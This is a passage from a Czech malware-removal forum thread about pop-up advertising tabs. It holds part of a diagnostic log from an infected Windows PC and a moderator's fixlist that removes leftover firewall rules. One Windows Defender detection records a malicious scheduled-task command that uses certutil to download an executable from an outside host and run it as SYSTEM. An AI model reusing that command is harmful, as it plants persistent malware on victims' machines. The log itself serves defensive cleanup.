==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\localhost -> localhost

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2019-03-19 06:49 - 2020-08-29 17:29 - 000001032 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 ultramediaburner.com
127.0.0.1 pro-zipper.com
127.0.0.1 productsdetails.online
127.0.0.1 post-back-url.com
127.0.0.1 rothsideadome.pw
127.0.0.1 room1.360dev.info
127.0.0.1 telechargini.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Milan\AppData\Roaming\Microsoft\Windows Photo Viewer\Tapeta programu Windows Prohlížeč fotografií.jpg
DNS Servers: 213.46.172.37 - 213.46.172.36
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{AF110A0F-4670-4C4D-BEE8-E19734C4583D}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9C06B5BB-EDC4-4D95-B199-0729186F7C06}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{35FE486C-13A8-4115-91BE-EADD94521488}] => (Allow) C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [TCP Query User{F4F5C31D-2AD9-4221-AC18-FD1AD4803957}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{7D5CA960-632A-4490-90D3-4E2015621578}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [{262D1130-0562-4ABD-9DBE-BD7A36B75E21}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{D223F931-EC0B-418D-9CA1-86DED4F80FF0}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{9B85BCFD-5637-46EF-A544-F5CDD031E56D}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{25501F14-C7E3-49B5-8AA0-F411A214A2BB}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{A3EBED2B-E21A-49AB-BEA3-6FB81621A465}E:\hry\stronghold 2\stronghold2.exe] => (Allow) E:\hry\stronghold 2\stronghold2.exe (Firefly Studios) [File not signed]
FirewallRules: [UDP Query User{B51E31E2-FC04-4595-B7AB-A56857E725E5}E:\hry\stronghold 2\stronghold2.exe] => (Allow) E:\hry\stronghold 2\stronghold2.exe (Firefly Studios) [File not signed]
FirewallRules: [TCP Query User{3382E28A-DDFD-4360-9788-92E872305F04}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{6D1B39C0-8474-4A82-A16B-37A2B363067E}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [TCP Query User{90FE4625-EC42-45BC-B81D-AEBFAAEB3605}E:\games\biped\biped.exe] => (Allow) E:\games\biped\biped.exe => No File
FirewallRules: [UDP Query User{F492EFD5-2DD1-4CEE-A197-77B815F15539}E:\games\biped\biped.exe] => (Allow) E:\games\biped\biped.exe => No File
FirewallRules: [{21A57DD2-2491-485C-BF53-169D9F586B7F}] => (Allow) C:\Users\Milan\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => No File
FirewallRules: [{50B518EB-89DF-4A79-BFA8-A6CFCEE55F17}] => (Allow) C:\Users\Milan\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => No File
FirewallRules: [TCP Query User{C6DD6FA6-D002-472C-8DC9-FD005438CE0E}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [UDP Query User{F44B8E13-1BA1-46B6-9654-F1C31E009A03}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{FA9AB6ED-0A91-4065-8E02-AB57F96CA02A}E:\hry\foundation\foundation.exe] => (Allow) E:\hry\foundation\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [UDP Query User{F35B841D-2C85-46D4-9B66-2CC2D1A4A33D}E:\hry\foundation\foundation.exe] => (Allow) E:\hry\foundation\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [TCP Query User{47D6DBFB-0BBF-4425-8906-78FA4190532B}E:\games\surviving mars\marssteam.exe] => (Allow) E:\games\surviving mars\marssteam.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [UDP Query User{D5D966E3-E806-4944-8A51-2B58DF1551EE}E:\games\surviving mars\marssteam.exe] => (Allow) E:\games\surviving mars\marssteam.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [{0A47C543-177F-4283-B753-89601E79F3E0}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{6608746E-BB0D-4940-80AE-71255BADFC02}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{E95688B6-E055-4354-9794-DC2A141C37A9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{9C304D1E-B5CB-412A-AF72-2E84EE6DCDF1}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{A50B23FA-CD55-4336-AD45-9DE5FF6B2823}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{9D976B0F-3F56-4B50-9E8E-0DA017F266E9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{325BD370-A36E-489E-A599-AB133BADB490}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{2A891082-BCF5-4CD4-82EF-E3EF4198782E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{894A84BA-5FED-41DC-9186-4EC56F14C63B}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{5BF0B819-43B4-4FF6-9491-0C2B932F5D11}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{B74BA9EF-DF6C-486F-838D-27C253A82114}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{C7EB689E-FBBC-4034-A5E3-A156344389B6}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{64E294F8-B0A6-432A-84E0-9AFEF4391F5E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{F2F85B56-CBE0-46DB-989F-B9836244F9B8}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{53DB185F-AC50-407C-8DBC-868D5480C1B9}] => (Allow) C:\Users\Milan\AppData\Roaming\0246cded558e\0246cded558e.exe => No File
FirewallRules: [{D9B09C69-0FBB-4B86-A187-7F523BE921BD}] => (Allow) C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe (AVG Technologies USA, LLC -> AVG Technologies)
FirewallRules: [{B4A64F44-B7A6-4440-999A-5FFAAEF842CE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E81F9AC5-5422-4213-958F-C5671008BBC2}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{C1A53E57-1C05-402F-9843-769C72041AAF}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{BB2A0095-2255-4148-8492-639C8E947BB4}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{C10798EC-1023-47BA-99E8-78A373C7CDC2}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{F24B45EA-5FD2-4E71-B6FD-B3064681C823}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)

==================== Restore Points =========================

28-08-2020 22:33:27 Naplánovaný kontrolní bod
29-08-2020 18:01:40 Operace obnovení
08-09-2020 17:10:36 Naplánovaný kontrolní bod

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (09/11/2020 04:35:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3056,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 65536 (0x0000000000010000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 04:35:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3056,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 04:35:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3056,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 32768 (0x0000000000008000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 04:35:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3056,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 04:35:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3056,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 16384 (0x0000000000004000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 04:35:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3056,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 04:35:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3056,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 8192 (0x0000000000002000) o 8192 (0x00002000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.

Error: (09/11/2020 04:35:38 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (3056,G,0) Pokus o čtení ze souboru C:\Users\Milan\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 8192 (0x00002000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.


System errors:
=============
Error: (09/11/2020 05:35:13 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: Server {E60687F7-01A1-40AA-86AC-DB1CBF673334} se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 05:33:13 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Služba wuauserv byla ukončena s následující chybou: 
Systém nemůže nalézt uvedený soubor.

Error: (09/11/2020 05:33:13 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: Server {E60687F7-01A1-40AA-86AC-DB1CBF673334} se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 05:31:13 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Služba wuauserv byla ukončena s následující chybou: 
Systém nemůže nalézt uvedený soubor.

Error: (09/11/2020 05:31:13 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: Server {E60687F7-01A1-40AA-86AC-DB1CBF673334} se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 05:29:13 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Služba wuauserv byla ukončena s následující chybou: 
Systém nemůže nalézt uvedený soubor.

Error: (09/11/2020 05:26:19 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: Server {E60687F7-01A1-40AA-86AC-DB1CBF673334} se v daném časovém limitu neregistroval u služby DCOM.

Error: (09/11/2020 05:24:19 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Služba wuauserv byla ukončena s následující chybou: 
Systém nemůže nalézt uvedený soubor.


Windows Defender:
===================================
Date: 2020-08-29 22:36:38.516
Description: 
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Wacatac.C!ml&threatid=2147749372&enterprise=0
Název: Trojan:Win32/Wacatac.C!ml
ID: 2147749372
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Program Files\M3PY0PHHSX\M3PY0PHHS.exe; file:_C:\Users\Milan\AppData\Local\Temp\acmiqlndjnf\zod1s2pvolq.exe; regkey:_HKCU@S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\KSK4ZMS2XB6IF7Y; runkey:_HKCU@S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\KSK4ZMS2XB6IF7Y
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Ochrana v reálném čase
Uživatel: DESKTOP-AJHPLSQ\Milan
Název procesu: C:\Windows\explorer.exe
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-08-29 22:36:38.513
Description: 
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Hynamer.C!ml&threatid=2147749152&enterprise=0
Název: Trojan:Win32/Hynamer.C!ml
ID: 2147749152
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Roaming\3k52z4f5aim\et53zradlff.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-08-29 22:36:38.510
Description: 
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Wacatac.DB!ml&threatid=2147757790&enterprise=0
Název: Trojan:Win32/Wacatac.DB!ml
ID: 2147757790
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Local\Temp\lttfjp4yc3u\vujrxhyhkrm.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-08-29 22:36:38.508
Description: 
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Cryptinject!MTB&threatid=2147729037&enterprise=0
Název: Trojan:Win32/Cryptinject!MTB
ID: 2147729037
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Local\Temp\dzekzdxxrlm\ifhvvyy.exe; file:_C:\Users\Milan\AppData\Local\Temp\r04v3ss32nl\ifhvvyy.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Ochrana v reálném čase
Uživatel: DESKTOP-AJHPLSQ\Milan
Název procesu: C:\Program Files (x86)\oizjd\53280214.exe
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-08-29 22:35:50.832
Description: 
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://bbistrovantonbb.com/app/app.exe C:\Users\Milan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Milan\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

CodeIntegrity:
===================================

Date: 2020-09-11 17:45:26.309
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 17:45:26.235
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 17:45:26.170
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 17:45:25.984
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 17:45:25.855
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 17:45:25.657
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 17:45:25.524
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-11 17:45:25.232
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

==================== Memory info =========================== 

BIOS: Award Software International, Inc. F3 07/28/2010
Motherboard: Gigabyte Technology Co., Ltd. GA-770T-D3L
Processor: AMD Athlon(tm) II X2 250 Processor
Percentage of memory in use: 32%
Total physical RAM: 12285.55 MB
Available physical RAM: 8348.96 MB
Total Virtual: 14141.55 MB
Available Virtual: 8577.13 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:476.31 GB) (Free:277.72 GB) NTFS
Drive e: (HDD-1000) (Fixed) (Total:931.51 GB) (Free:737.23 GB) NTFS
Drive f: (ZelenyHDD) (Fixed) (Total:465.76 GB) (Free:28.95 GB) NTFS
Drive g: (Car Mechanic Simulator 2018 Merc) (CDROM) (Total:7.51 GB) (Free:0 GB) UDF

\\?\Volume{5d2f0ce6-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{5d2f0ce6-0000-0000-0000-101a77000000}\ () (Fixed) (Total:0.53 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 476.9 GB) (Disk ID: 5D2F0CE6)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=476.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=543 MB) - (Type=27)

==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 8C19AC0D)

Partition: GPT.

==========================================================
Disk: 2 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: BFAA9354)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118199
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#7 Příspěvek od Rudy »

Otevřte poznámkový blok a zkopírujte do něj:
Start

CloseProcesses:
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
FirewallRules: [TCP Query User{90FE4625-EC42-45BC-B81D-AEBFAAEB3605}E:\games\biped\biped.exe] => (Allow) E:\games\biped\biped.exe => No File
FirewallRules: [UDP Query User{F492EFD5-2DD1-4CEE-A197-77B815F15539}E:\games\biped\biped.exe] => (Allow) E:\games\biped\biped.exe => No File
FirewallRules: [{21A57DD2-2491-485C-BF53-169D9F586B7F}] => (Allow) C:\Users\Milan\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => No File
FirewallRules: [{50B518EB-89DF-4A79-BFA8-A6CFCEE55F17}] => (Allow) C:\Users\Milan\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => No File
FirewallRules: [TCP Query User{C6DD6FA6-D002-472C-8DC9-FD005438CE0E}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [UDP Query User{F44B8E13-1BA1-46B6-9654-F1C31E009A03}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{325BD370-A36E-489E-A599-AB133BADB490}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{2A891082-BCF5-4CD4-82EF-E3EF4198782E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{894A84BA-5FED-41DC-9186-4EC56F14C63B}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{5BF0B819-43B4-4FF6-9491-0C2B932F5D11}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{B74BA9EF-DF6C-486F-838D-27C253A82114}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{C7EB689E-FBBC-4034-A5E3-A156344389B6}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{64E294F8-B0A6-432A-84E0-9AFEF4391F5E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{F2F85B56-CBE0-46DB-989F-B9836244F9B8}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
